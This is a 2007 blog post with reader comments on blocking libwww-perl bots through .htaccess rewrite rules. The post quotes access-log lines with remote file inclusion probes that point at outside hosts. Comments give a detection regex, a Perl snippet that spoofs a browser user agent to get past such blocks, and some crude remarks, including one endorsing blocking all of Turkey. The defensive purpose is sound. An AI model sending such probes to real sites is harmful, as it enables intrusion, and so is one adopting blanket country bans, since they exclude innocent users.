If you look through your server logs you’ll probably notice more than a few requests like these:
GET //wp-pass.php?_wp_http_referer=http://148.245.107.2/.ssh/id.txt?? … “libwww-perl/5.805″
GET /2004/02/18/smoking-ban-is-on-the-way/trackback/ … “libwww-perl/5.805″
GET /2004/02/18/irish-car-tax-list/trackback/ … “libwww-perl/5.805″
GET /tag/php//tags.php?BBCodeFile=http://drpepper.gigacities.net/id.txt? … “libwww-perl/5.579″
If you do find them (grep libwww-perl access_log) then add the following code to your .htaccess file. On a WordPress site this file should already be there if you’re using fancy permalinks.
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} libwww-perl.*
RewriteRule .* – [F,L]
Change “RewriteBase /” to suit your own base directory.
There are other bad guys out there. This page has a long list of rewrite rules to keep out all sorts of bots! I haven’t looked through them myself so YMMV if you try them.
This has the added benefit of reducing load on your server. WordPress sites are dynamically generated. This is great under normal circumstances but when you get a flood of requests it can place an unnecessary load on your site. WP-Cache helps a lot but these rules will stop them dead at the front door!
PS. ‘Course, if you depend on a libwww-perl application then don’t add this rule or you may give yourself a headache trying to figure out why things stopped working!

40 Comments
Robert (16 comments.) on October 10, 2007 at 10:31 am.
Great tip, thanks Donncha.
I had a similar post before because I was getting lots of trackback attempts from WordPress 2.1 alpha and TrackBack/1.0.2. My htaccess is here:
http://www.sweetnam.eu/blog/index.php?/archives/110-Using-.htaccess-to-block-useragents.html
Donncha (1707 comments.) on October 10, 2007 at 10:40 am.
Wow, blocking WordPress is a bit drastic, but I can understand why you did it. It might be better to block by IP or IP range rather than UA in that case?
Robert (16 comments.) on October 10, 2007 at 10:51 am.
It was a drastic decision that I had to put in place because there were literally hundred of them per hour. All from 2.1 alpha It lasted about 1 week and then suddenly stopped so I removed the WordPress entry.
Since the 15th of Sept there have been 7031 attempts to spam my old blog.
3209 – No useragent
1749 – TrackBack/1.02
1338 – Opera/9.0
The rest are b2evolution, IE6.0 etc.
Baris Unver (4 comments.) on October 10, 2007 at 10:56 am.
The page you linked includes a code banning IP addresses from Turkey. That’s offensive man, not all of us are bad – but yes, I admit that we got the most idiotic hacker wannabes and those who use internet to curse, fart and try to get laid. Does that mean all of us must be keeped out from websites?
David Precious (18 comments.) on October 10, 2007 at 11:06 am.
I’d say banning libwww-perl user agents is a bit drastic too – there’s plenty of decent LWP-based scripts doing useful things.
Granted, they can easily change the user-agent to something more descriptive of what they are and leave out the libwww-perl – but so can any attacker.
I’m surprised that anyone writing attack tools using LWP doesn’t just mimic a common user-agent like IE or Firefox rather than leaving it on the default!
Donncha (1707 comments.) on October 10, 2007 at 11:07 am.
Baris – that’s why I said, “I haven’t looked through them myself so YMMV if you try them.” As you can see yourself since you left a comment here, I haven’t adopted his rules. Thank you for the warning!
Robert – woah, nasty stuff. Glad to see you’re using Akismet now!
Donncha (1707 comments.) on October 10, 2007 at 11:10 am.
David – I know! I couldn’t believe it when I spotted them ages ago, but they’re still at it well over a year after I first noticed them.
TBH – if someone is using a script to interrogate my site I’d hope they have the courtesy to tell me about it first. So far noone has so I don’t worry about blocking them.
Seeing a 403 on those requests is *so* satisfying too!
Robert (34 comments.) on October 10, 2007 at 11:13 am.
It’s up to 7044 now:
http://www.sweetnam.eu/blogspam/
Aaron (2 comments.) on October 10, 2007 at 2:34 pm.
I use the redirection plugin, and to block this sort of stuff I just use a REGEX and redirect them all through an ALEXA redirect to my home page.
Most of them won’t follow the redirect, but it does block them.
.*php\?(page|j|o|r|file|sub|.*?)=(http|ftp).*walter (4 comments.) on October 10, 2007 at 2:48 pm.
I echo david’s comment. Not all libwww-perl requests are malicious. Could you at least change the title of your post so it doesn’t paint us genuine perl programmers in such a bad light ? Perl has enough of an image problem already without this.
Donncha (1707 comments.) on October 10, 2007 at 2:54 pm.
Walter – changed “bad guys” to “bots” in the title, but the URL can’t change. Sorry if I upset, I definitely don’t want to make out all Perl coders are bad!
Baris Unver (4 comments.) on October 10, 2007 at 3:20 pm.
Aaron, I use Redirection, too. Can you explain how do we add the regex code?
A.J. (2 comments.) on October 10, 2007 at 6:32 pm.
I have to admit that I’m a bit disappointed in this post as a whole. To suggest blocking libwww-perl completely is sort of like saying we should close down all roads because wrecks frequently happen on them.
That said, if the idea is to reduce spam to one’s blog, wouldn’t it be wise to at least setup some exlusions and block libwww-perl for your comments and postback forms only? To block it out in total is to prevent some news readers/aggregators from getting to your xml/atom/rss feeds.
Dankoozy (41 comments.) on October 10, 2007 at 6:36 pm.
What do the libwww-perl guys usually do? spamming?
I think i’m going to ban those Opera/9.0 fuckers too. I don’t think there is one legit opera 9.0 user left on the internet and if there is one they can upgrade to 9.2 or change their UA.
I have no rewrite engine installed I but there’s another easier way to ban them.
http://httpd.apache.org/docs/2.0/mod/mod_access.html#deny
Bob! (1 comments.) on October 10, 2007 at 6:45 pm.
Thanks for the advice and the link Donncha. I have added the whole list from that page although I’ve been through it and commented out the Turkey IP’s as that seemed a bit extreme
I can always uncomment any of them if I ever get any hassle from them in the future.
Donncha (1707 comments.) on October 10, 2007 at 6:49 pm.
AJ – the libwww scripts I see hitting my site hit all sorts of urls, not just comment and trackback urls. Even non-existant urls, looking for an exploit.
I think a huge majority of them are not trying to spam, they’re trying to break into my site. I’m not worried that they’ll succeed because I try to keep up to date but it’s a useful way of stopping them before they hit any php code.
Dan – exploits, almost all exploits as I said above.
I actually added a check for Opera 9 to my comment form but I dump all the comments stopped in a file. Check it out here: http://ocaoimh.ie/spam.txt (for the time being, will be removed!)
Aaron (2 comments.) on October 10, 2007 at 7:53 pm.
Go to the Redirection control Panel.
Scroll to the bottom where it says “Add Redirection”:
Add you regEX as the source url eg: (.*php\?(page|j|o|r|file|sub|.*?)=(http|ftp).*)
Add the file you want to redirect to in the “Target URL”
Select the checkbox that says “Regex”
Click add Regex.
You can also use REGEX when deleting post categories:
Source URL: “/my/original/category/(.*)”
Target URL: “/some/othercategory/$1″
Baris Unver (4 comments.) on October 10, 2007 at 8:00 pm.
Thanks a lot.
By the way, I gotta learn that Regex thing, it seems to work for loads of stuff.
RobertWms (1 comments.) on October 10, 2007 at 10:07 pm.
Isn’t this the sort of thing that Bad Behavior blocks?
Nick Georgakis (1 comments.) on October 11, 2007 at 1:08 am.
Hello Doncha,
My blog was seriously messed up by a libwww bot last week so I have also implemented similar .htaccess rules.
Two of my favorite 403 – Forbidden alternatives are:
402 – Payment required
and a 301 – Permanent Redirect to their own hostname / remote IP with their maliciously crafted exploit URL untouched!
I am currently testing a few additional regexps to block more malicious bots by detecting remote inclusion attempt strings/patterns in the requested URLs but it needs more testing before publishing it.
Platinax (1 comments.) on October 11, 2007 at 3:08 pm.
It’s certainly interesting to see WordPress used as a user-agent. Is that simply an attempt to cover tracks, or simply the sloppy way some spambots are configured?
A.J. (2 comments.) on October 11, 2007 at 3:10 pm.
Donncha,
Perhaps in your case that works. I’ve not been hit so terribly by libwww-perl on my site. But being a PHP and Perl programmer myself, I regularly write apps for people who are looking to incorporate blog RSS/XML/ATOM feeds into their headlines or sites. Of course of late I’m doing most of that work in PHP, but I’m still doing some sites that prefer to crawl feeds in perl and database them. For my clients, I always set the agent name and it refers back to their site so a webmaster could easily tell that they had been crawled by that particular site, but my point remains that libwww-perl is frequently used to retrieve XML/RSS/ATOM feeds. If you exclude it across the board, you are stopping out some sites from reading your feed.
Pingback: BlogSecurity » keeping the bots out
valent on October 14, 2007 at 9:00 pm.
Thank a lot, I was totally lost before. I hate wwwlib-perl.
Jason Litka (5 comments.) on October 14, 2007 at 11:04 pm.
I’ve been noticing these on my site for some time now. Not knowing what they were, but seeing that they were causing a lot of 404′s by hitting non-existent URLs, I 403 banned them with a plugin quite some time ago.
cuervo (1 comments.) on October 15, 2007 at 5:58 am.
Harsh. Too harsh. I’m a Perl programmer, and I use LWP::UserAgent all the time. I tend not to touch the $ua->agent, or I append contact info or a URL to it, so people know what I’m doing.
In particular, I wrote a Jabber bot that periodically goes out and fetches RSS feeds (via LWP::UserAgent), then retransmits those feeds over Jabber to its subscribers.
Seems to me you’re curing the symptoms — it’ll probably cure the disease, but you might kill a few patients along the way.
@Platinax: The WordPress user agent is actually used for trackbacks and whatnot, IIRC.
Pingback: Antonio Trigiani w3bL0g - Informatica Virale » Blog Archive » Evitare attacchi libwww-perl user agent bot sul proprio blog.
Pingback: TechTraction » Blog Archive » TechTraction’s Friday Finds for 10/19/07: Stop the Perl Bots
engtech (1 comments.) on October 20, 2007 at 11:05 pm.
I’m going to have to get in the habit of identifying my user agent properly when I build my perl scripts.
Pingback: Donncha’s Thursday Links at Holy Shmoly!
olly on January 29, 2008 at 3:52 pm.
Hi,
Great post and very useful.
By blocking libwww-perl will it have any impact on general users using IE or Firefox who visit a web site? Also what impact does blocking libwww-perl have on search bots ( google , yahoo ) or does it only effect people trying to launch attacks with libwww-perl
Mike on April 15, 2008 at 5:38 am.
Why is everyone getting defensive about being a perl programmer? EVERYTHING that hits your site with the user agent “libwww” is CRAP.. that is the bottom line.. Oh, and blocking all of Turkey sounds good too
Holly (1 comments.) on April 25, 2008 at 5:09 pm.
Any suggested links forthe Regex thing?
Dark (1 comments.) on April 26, 2008 at 12:18 am.
@olly No it wont, and fot the bots, their user agents look very like a regular user’s one, except that it has added a line GoogleBot-2.0 (for example) inside the () where it says MSIE-6 compatible; win32 and stuff like that…
that’s my .20
patricia (1 comments.) on May 13, 2008 at 7:24 pm.
hi, i a noob, could you explain to me what is this?:
“RewriteBase /”
thanks
anonymous (1 comments.) on June 27, 2008 at 3:26 pm.
Yeah great!!!
my $ua = LWP::UserAgent->new;
$ua->agent(“Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008043010 Fedora/3.0-0.60.beta5.fc9 Firefox/3.0b5″);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
if($res->is_success) {
} else {
}
“I hate wwwlib-perl.”
And Firefox?
Stephen Frazier (1 comments.) on July 5, 2008 at 1:45 pm.
All the tips and comments are great, but obviously directed to or between PROGRAMMERS who understand all the shortcuts and abbreviations so foreign to the regular schmuck like me.
All the other ways to block spam are just not helpful to those of us who just want to put up a site and then go do other stuff. Like WORK.
I don’t mind doing a little pseudo-programming, but at least someone could tell us where to find these mystery files.
I’m still trying to find this MOD_REWRITE file.
Pingback: Me Blog! | Keeping the spambots and crawlers at bay
Steve1974 on March 23, 2009 at 4:54 am.
ok, this may sound daft but just use robots.txt file to control them. THEN the ones that ignore the robots.txt file can be blocked … read the following article
http://www.pixel2life.com/publish/tutorials/472/log_and_block_bad_bots_that_disregard_robots_txt/
I have used a simular method for a long time and have blocked ALL bad bots. It updates itself.
Pingback: Default .htaccess file for all sites | jonathan stegall: creative tension